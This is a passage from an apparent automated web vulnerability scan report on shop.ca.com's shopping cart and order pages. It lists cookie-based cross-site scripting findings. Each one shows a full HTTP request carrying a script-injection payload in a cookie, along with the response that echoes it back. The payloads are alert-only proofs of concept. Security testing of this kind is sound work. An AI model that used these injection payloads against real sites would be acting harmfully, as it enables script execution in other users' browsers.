Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--IS3_GSV :DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com375b3--><script>alert(1)</script>f7d3ee7a31-->
...[SNIP]...
4.310. http://shop.ca.com/cgi-bin/ShoppingCart.asp [IS3_History cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/ShoppingCart.asp

Issue detail

The value of the IS3_History cookie is copied into an HTML comment. The payload 3142f--><script>alert(1)</script>9d6572aff29 was submitted in the IS3_History cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/ShoppingCart.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_03142f--><script>alert(1)</script>9d6572aff29; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:38 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:39 GMT
Content-Length: 16117
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--IS3_History :1301114230-2-91_0--2__0_03142f--><script>alert(1)</script>9d6572aff29-->
...[SNIP]...
4.311. http://shop.ca.com/cgi-bin/ShoppingCart.asp [SessionId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/ShoppingCart.asp

Issue detail

The value of the SessionId cookie is copied into an HTML comment. The payload 6dfdb--><script>alert(1)</script>1eb17459348 was submitted in the SessionId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/ShoppingCart.asp?msg= HTTP/1.1
Host: shop.ca.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Cart=Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; SessionId=13103492201104170854451731932142436dfdb--><script>alert(1)</script>1eb17459348; SRCCODE=CAWEB; beta=Y; SRVR=WEBX140%2D01C; DB=msRandX=93&msProduct=1782427&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.1.10.1303044886

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 12:58:58 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:58:58 GMT
Connection: close
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Content-Length: 15773

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--SessionId :13103492201104170854451731932142436dfdb--><script>alert(1)</script>1eb17459348-->
...[SNIP]...
4.312. http://shop.ca.com/cgi-bin/ShoppingCart.asp [__utma cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/ShoppingCart.asp

Issue detail

The value of the __utma cookie is copied into an HTML comment. The payload add8f--><script>alert(1)</script>1dc24971d6e was submitted in the __utma cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/ShoppingCart.asp?msg= HTTP/1.1
Host: shop.ca.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Cart=Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; SessionId=1310349220110417085445173193214243; SRCCODE=CAWEB; beta=Y; SRVR=WEBX140%2D01C; DB=msRandX=93&msProduct=1782427&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=36441954.679833155.1303044886.1303044886.1303044886.1add8f--><script>alert(1)</script>1dc24971d6e; __utmc=36441954; __utmb=36441954.1.10.1303044886

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 12:59:00 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:59:00 GMT
Connection: close
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Content-Length: 15773

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--__utma :36441954.679833155.1303044886.1303044886.1303044886.1add8f--><script>alert(1)</script>1dc24971d6e-->
...[SNIP]...
4.313. http://shop.ca.com/cgi-bin/ShoppingCart.asp [__utmb cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/ShoppingCart.asp

Issue detail

The value of the __utmb cookie is copied into an HTML comment. The payload 91219--><script>alert(1)</script>0df6d14cc15 was submitted in the __utmb cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/ShoppingCart.asp?msg= HTTP/1.1
Host: shop.ca.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Cart=Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; SessionId=1310349220110417085445173193214243; SRCCODE=CAWEB; beta=Y; SRVR=WEBX140%2D01C; DB=msRandX=93&msProduct=1782427&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.1.10.130304488691219--><script>alert(1)</script>0df6d14cc15

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 12:59:02 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:59:01 GMT
Connection: close
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Content-Length: 15773

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--__utmb :36441954.1.10.130304488691219--><script>alert(1)</script>0df6d14cc15-->
...[SNIP]...
4.314. http://shop.ca.com/cgi-bin/ShoppingCart.asp [__utmc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/ShoppingCart.asp

Issue detail

The value of the __utmc cookie is copied into an HTML comment. The payload e5fe4--><script>alert(1)</script>4f7d177caa6 was submitted in the __utmc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/ShoppingCart.asp?msg= HTTP/1.1
Host: shop.ca.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Cart=Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; SessionId=1310349220110417085445173193214243; SRCCODE=CAWEB; beta=Y; SRVR=WEBX140%2D01C; DB=msRandX=93&msProduct=1782427&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954e5fe4--><script>alert(1)</script>4f7d177caa6; __utmb=36441954.1.10.1303044886

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 12:59:00 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:59:01 GMT
Connection: close
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Content-Length: 15773

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--__utmc :36441954e5fe4--><script>alert(1)</script>4f7d177caa6-->
...[SNIP]...
4.315. http://shop.ca.com/cgi-bin/ShoppingCart.asp [__utmz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/ShoppingCart.asp

Issue detail

The value of the __utmz cookie is copied into an HTML comment. The payload 8864b--><script>alert(1)</script>db873c5a861 was submitted in the __utmz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/ShoppingCart.asp?msg= HTTP/1.1
Host: shop.ca.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Cart=Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; SessionId=1310349220110417085445173193214243; SRCCODE=CAWEB; beta=Y; SRVR=WEBX140%2D01C; DB=msRandX=93&msProduct=1782427&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)8864b--><script>alert(1)</script>db873c5a861; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.1.10.1303044886

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 12:58:58 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:58:59 GMT
Connection: close
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Content-Length: 15773

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--__utmz(36441954.1303:(direct)|utmccn=(direct)|utmcmd=(none)8864b--><script>alert(1)</script>db873c5a861-->
...[SNIP]...
4.316. http://shop.ca.com/cgi-bin/ShoppingCart.asp [_clogin cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/ShoppingCart.asp

Issue detail

The value of the _clogin cookie is copied into an HTML comment. The payload 1646a--><script>alert(1)</script>db9335b70ec was submitted in the _clogin cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/ShoppingCart.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=13030469394521646a--><script>alert(1)</script>db9335b70ec;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:42 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:42 GMT
Content-Length: 16117
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--_clogin(e) :13030469394521646a--><script>alert(1)</script>db9335b70ec-->
...[SNIP]...
4.317. http://shop.ca.com/cgi-bin/order.asp [Cart cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the Cart cookie is copied into an HTML comment. The payload 3d1cc--><script>alert(1)</script>fb799069361 was submitted in the Cart cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp3d1cc--><script>alert(1)</script>fb799069361; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Length: 16117
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:44 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:45 GMT
Connection: close
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp3d1cc%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Efb799069361&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--Cart(Landing) :http://shop.ca.com/ca/resources/resources.asp3d1cc--><script>alert(1)</script>fb799069361-->
...[SNIP]...
4.318. http://shop.ca.com/cgi-bin/order.asp [CoreID6 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the CoreID6 cookie is copied into an HTML comment. The payload 6b280--><script>alert(1)</script>41767fe1d77 was submitted in the CoreID6 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=6b280--><script>alert(1)</script>41767fe1d77; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:46 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:46 GMT
Content-Length: 16117
Connection: close
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--CoreID6(818720507435:6b280--><script>alert(1)</script>41767fe1d77-->
...[SNIP]...
4.319. http://shop.ca.com/cgi-bin/order.asp [DB cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the DB cookie is copied into an HTML comment. The payload 28157--><script>alert(1)</script>38e08d480c7 was submitted in the DB cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
